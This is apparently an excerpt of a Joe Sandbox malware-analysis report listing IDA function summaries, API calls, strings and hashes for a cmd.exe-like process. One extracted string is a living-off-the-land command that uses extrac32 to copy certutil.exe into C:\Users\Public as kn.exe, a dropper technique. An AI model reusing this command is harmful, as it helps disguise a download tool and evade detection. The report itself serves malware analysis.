FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF683F9E964), ref: 00007FF683F9F092
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF683F9E964), ref: 00007FF683F9F0A5
towupper.MSVCRT ref: 00007FF683F9F0DB
wcschr.MSVCRT ref: 00007FF683F9F135
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF683F9E964), ref: 00007FF683F9F16C
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF683F9E964), ref: 00007FF683F9F185

Part of subcall function 00007FF683F801B8: _get_osfhandle.MSVCRT ref: 00007FF683F801C4
Part of subcall function 00007FF683F801B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF683F8E904,?,?,?,?,00000000,00007FF683F83491,?,?,?,00007FF683F94420), ref: 00007FF683F801D6

Strings

CMD.EXE, xrefs: 00007FF683F9F19D
<noalias>, xrefs: 00007FF683F9F03C

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
String ID: <noalias>$CMD.EXE
API String ID: 1161012917-1690691951
Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
Instruction ID: c59a6c81036a72dcea36d0b5ef28b592d5de66d637f8689b21107f99135547b5
Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
Instruction Fuzzy Hash: 5C919F21B09642CAFB149F61E8121BD7AA0BF49B59F4C413ADD0EB3694DF3CA445C390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F732B0 Relevance: 27.2, APIs: 18, Instructions: 243COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F83578: _get_osfhandle.MSVCRT ref: 00007FF683F83584
Part of subcall function 00007FF683F83578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F8359C
Part of subcall function 00007FF683F83578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F835C3
Part of subcall function 00007FF683F83578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F835D9
Part of subcall function 00007FF683F83578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F835ED
Part of subcall function 00007FF683F83578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F83602

_get_osfhandle.MSVCRT ref: 00007FF683F732F3
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF683F732A4), ref: 00007FF683F73309
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF683F73384
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F911DF

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
String ID:
API String ID: 611521582-0
Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
Instruction ID: 7d4ebcf29b10ef1f78fe2525a749c806e6be209e87838ad4f368cc083e425027
Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
Instruction Fuzzy Hash: CEA1A122B08652DAEB148F65E8062BDA6A1FF49B59F4C813EDD0EE7784DF3CD445C680

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F71560 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 338fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F715BD

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F71620
FindClose.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F71638
FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F716C0

Part of subcall function 00007FF683F71560: FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F717F0
Part of subcall function 00007FF683F71560: FindClose.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F7180C
Part of subcall function 00007FF683F71560: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F7183E

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F8AC35
SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F8AC68

Strings

\\?\, xrefs: 00007FF683F8AC99

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
String ID: \\?\
API String ID: 628682198-4282027825
Opcode ID: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
Instruction ID: e846dfedeb46d1a4de4cfb4f1ae5665d19806169cf2ca98c6d7865a34e0c5539
Opcode Fuzzy Hash: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
Instruction Fuzzy Hash: E5E18D22A086C2D6EF649F25D8422F963A1FF45749F484139EA0E977D4EF3CE549C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9AFBC Relevance: 26.0, APIs: 17, Instructions: 537COMMON

Download Yara Rule

APIs

longjmp.MSVCRT(?,?,?,?,00007FF683F9182A), ref: 00007FF683F9AFD8
_setjmp.MSVCRT ref: 00007FF683F9B032

Part of subcall function 00007FF683F7D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D46E
Part of subcall function 00007FF683F7D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D485
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D4EE
Part of subcall function 00007FF683F7D3F0: iswspace.MSVCRT ref: 00007FF683F7D54D
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D569
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D58C

memset.MSVCRT ref: 00007FF683F9B126
memset.MSVCRT ref: 00007FF683F9B14C
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F9B266
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F9B281

Part of subcall function 00007FF683F9AFBC: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F9B717
Part of subcall function 00007FF683F9AFBC: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F9B736
Part of subcall function 00007FF683F9AFBC: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F9B755

Part of subcall function 00007FF683F83A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF683F9EAC5,?,?,?,00007FF683F9E925,?,?,?,?,00007FF683F7B9B1), ref: 00007FF683F83A56

Part of subcall function 00007FF683F9AFBC: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F9B7D2
Part of subcall function 00007FF683F9AFBC: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F9B7F1
Part of subcall function 00007FF683F9AFBC: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F9B810

wcschr.MSVCRT ref: 00007FF683F9B2AA
memset.MSVCRT ref: 00007FF683F9B2E0

Part of subcall function 00007FF683F81EA0: wcschr.MSVCRT ref: 00007FF683F81EB3

wcsrchr.MSVCRT ref: 00007FF683F9B4BC
MoveFileWithProgressW.API-MS-WIN-CORE-FILE-L2-1-0 ref: 00007FF683F9B692
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F9B6A2

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
String ID:
API String ID: 16309207-0
Opcode ID: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
Instruction ID: 158cdce1c46574c68c3871742c0324ae4db53974fb0914526402666c6724ca93
Opcode Fuzzy Hash: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
Instruction Fuzzy Hash: 2522C022B09B82C6EF649F25D8562F963A0FF49788F484139DA0E9BB95DF3CE545C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7CE10 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON

Download Yara Rule

APIs

_tell.MSVCRT ref: 00007FF683F7CEAF
memset.MSVCRT ref: 00007FF683F7CF5C
_wcsicmp.MSVCRT ref: 00007FF683F7CFAE
GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF683F7D003
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F7D01E
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F7D044
EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF683F8C889
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF683F8C8A2

Strings

GOTO, xrefs: 00007FF683F7D0A3
extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF683F8C9F1

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
String ID: GOTO$extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
API String ID: 3863671652-365281591
Opcode ID: feb1bbf7feb49ee9d99dd0502c92dc49cdd19241ad0cb0e0275a55cbab1dd980
Instruction ID: 0cd0b3630e68df3a2d90c90231f19b017705bbc7c5dbf64b3674a02c2bf865c3
Opcode Fuzzy Hash: feb1bbf7feb49ee9d99dd0502c92dc49cdd19241ad0cb0e0275a55cbab1dd980
Instruction Fuzzy Hash: AFE1DE21A0D682C6FA649B16E4563B966A0BF85744F4C403DE90EF73E5DF7CE846C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F73410 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 160windowCOMMON

Download Yara Rule

APIs

FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F73477
wcschr.MSVCRT ref: 00007FF683F734A0
FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F734DF
_ultoa.MSVCRT ref: 00007FF683F912DA
GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F912E6
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF683F9131E

Strings

Application, xrefs: 00007FF683F91341
System, xrefs: 00007FF683F9133A
, xrefs: 00007FF683F912FB

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
String ID: $Application$System
API String ID: 3538039442-1881496484
Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
Instruction ID: cb1d6dd4986b5415660c28b3858a3372ed955fa6dd74bd81472ec4c7bacba8b4
Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
Instruction Fuzzy Hash: EE51AD32A08B81D6EB248F15B40167ABAA1FF89B84F488539DE4E93754DF3CD445C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9D9D0 Relevance: 23.3, APIs: 10, Strings: 3, Instructions: 576fileCOMMON

Download Yara Rule

APIs

longjmp.MSVCRT(?,?,00000000,00007FF683F9048E), ref: 00007FF683F9DA58
memset.MSVCRT ref: 00007FF683F9DAD6
memset.MSVCRT ref: 00007FF683F9DAFC
memset.MSVCRT ref: 00007FF683F9DB22

Part of subcall function 00007FF683F83A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF683F9EAC5,?,?,?,00007FF683F9E925,?,?,?,?,00007FF683F7B9B1), ref: 00007FF683F83A56

Part of subcall function 00007FF683F75194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF683F751C4

Part of subcall function 00007FF683F8823C: FindFirstFileExW.KERNELBASE ref: 00007FF683F88280
Part of subcall function 00007FF683F8823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F8829D

Part of subcall function 00007FF683F801B8: _get_osfhandle.MSVCRT ref: 00007FF683F801C4
Part of subcall function 00007FF683F801B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF683F8E904,?,?,?,?,00000000,00007FF683F83491,?,?,?,00007FF683F94420), ref: 00007FF683F801D6

Part of subcall function 00007FF683F74FE8: _get_osfhandle.MSVCRT ref: 00007FF683F75012
Part of subcall function 00007FF683F74FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F75030

GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F9DDB0

Part of subcall function 00007FF683F759E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F75A2E
Part of subcall function 00007FF683F759E4: _open_osfhandle.MSVCRT ref: 00007FF683F75A4F

_get_osfhandle.MSVCRT ref: 00007FF683F9DDEB
SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F9DDFA
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F9E204
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F9E223
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F9E242

Strings

%s, xrefs: 00007FF683F9DC95, 00007FF683F9E00C
%9d, xrefs: 00007FF683F9D9EF
~, xrefs: 00007FF683F9DB34

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
String ID: %9d$%s$~
API String ID: 3651208239-912394897
Opcode ID: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
Instruction ID: bf81b6cb30ba74f342eb860b1f5aa1ed8e35df9a9a94c3dc888f5eae8fceb903
Opcode Fuzzy Hash: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
Instruction Fuzzy Hash: 3B429332A08682C7EB649F21D8521F977A0FF85744F58013AEA4DE7A99DF3CE551CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7372C Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 396COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F73921

Part of subcall function 00007FF683F809F4: iswspace.MSVCRT ref: 00007FF683F80A11
Part of subcall function 00007FF683F809F4: wcschr.MSVCRT ref: 00007FF683F80A2B

wcsrchr.MSVCRT ref: 00007FF683F737D2
_wcsnicmp.MSVCRT ref: 00007FF683F7381A
wcsrchr.MSVCRT ref: 00007FF683F73A0C
wcsrchr.MSVCRT ref: 00007FF683F73A35
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F73A9D
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F73ACC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F73AE1
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F73B1E

Strings

COPYCMD, xrefs: 00007FF683F737AE
\, xrefs: 00007FF683F73AB9

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
String ID: COPYCMD$\
API String ID: 3989487059-1802776761
Opcode ID: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
Instruction ID: 0f615a298e950d2030c98d21431e4112b5ebb4b96e938ab386a889e8e91db037
Opcode Fuzzy Hash: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
Instruction Fuzzy Hash: 1DF1C266B08786D1EF649F15D5062BA63B1FF45B88F08813ADE4EA7794EE3CE045C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F83140 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 229timeCOMMON

Download Yara Rule

APIs

GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00007FF683F83189
SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0 ref: 00007FF683F8319F
FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F831B5
FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0 ref: 00007FF683F831CB
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F8E619
GetTimeFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0 ref: 00007FF683F8E738

Strings

.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC, xrefs: 00007FF683F83147
HH:mm:ss t, xrefs: 00007FF683F8E629
, xrefs: 00007FF683F8E718
%02d%s%02d%s, xrefs: 00007FF683F8E799
%2d%s%02d%s%02d%s%02d, xrefs: 00007FF683F83236, 00007FF683F8E5C9

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Time$File$System$FormatInfoLocalLocale
String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
API String ID: 55602301-2548490036
Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
Instruction ID: fc332110fc6cd80418747da26cc9a4672aecd510549ce4bdde765319e8d75e73
Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
Instruction Fuzzy Hash: 27A1D532B18742D6EB148F11E4422BE77A1FF94754F58013AEA5EA76A4EF3CE544CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683FA1538 Relevance: 19.7, APIs: 13, Instructions: 169filememorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683FA1408: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683FA142A
Part of subcall function 00007FF683FA1408: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683FA144F

Part of subcall function 00007FF683FA1408: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683FA146C

SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683FA15A8
CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683FA15D1
CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683FA160B
RtlDosPathNameToNtPathName_U.NTDLL ref: 00007FF683FA1635
memset.MSVCRT ref: 00007FF683FA1677
memmove.MSVCRT ref: 00007FF683FA16AD
memmove.MSVCRT ref: 00007FF683FA16E6
NtFsControlFile.NTDLL ref: 00007FF683FA171D
RtlNtStatusToDosError.NTDLL ref: 00007FF683FA172F
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683FA173D
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF683FA1754
RtlFreeHeap.NTDLL ref: 00007FF683FA177F
RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683FA1797

Part of subcall function 00007FF683FA1A40: memset.MSVCRT ref: 00007FF683FA1AA6
Part of subcall function 00007FF683FA1A40: memset.MSVCRT ref: 00007FF683FA1ACC
Part of subcall function 00007FF683FA1A40: GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683FA1B3E
Part of subcall function 00007FF683FA1A40: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683FA1B67
Part of subcall function 00007FF683FA1A40: GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683FA1BD7
Part of subcall function 00007FF683FA1A40: _wcsicmp.MSVCRT ref: 00007FF683FA1C05

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
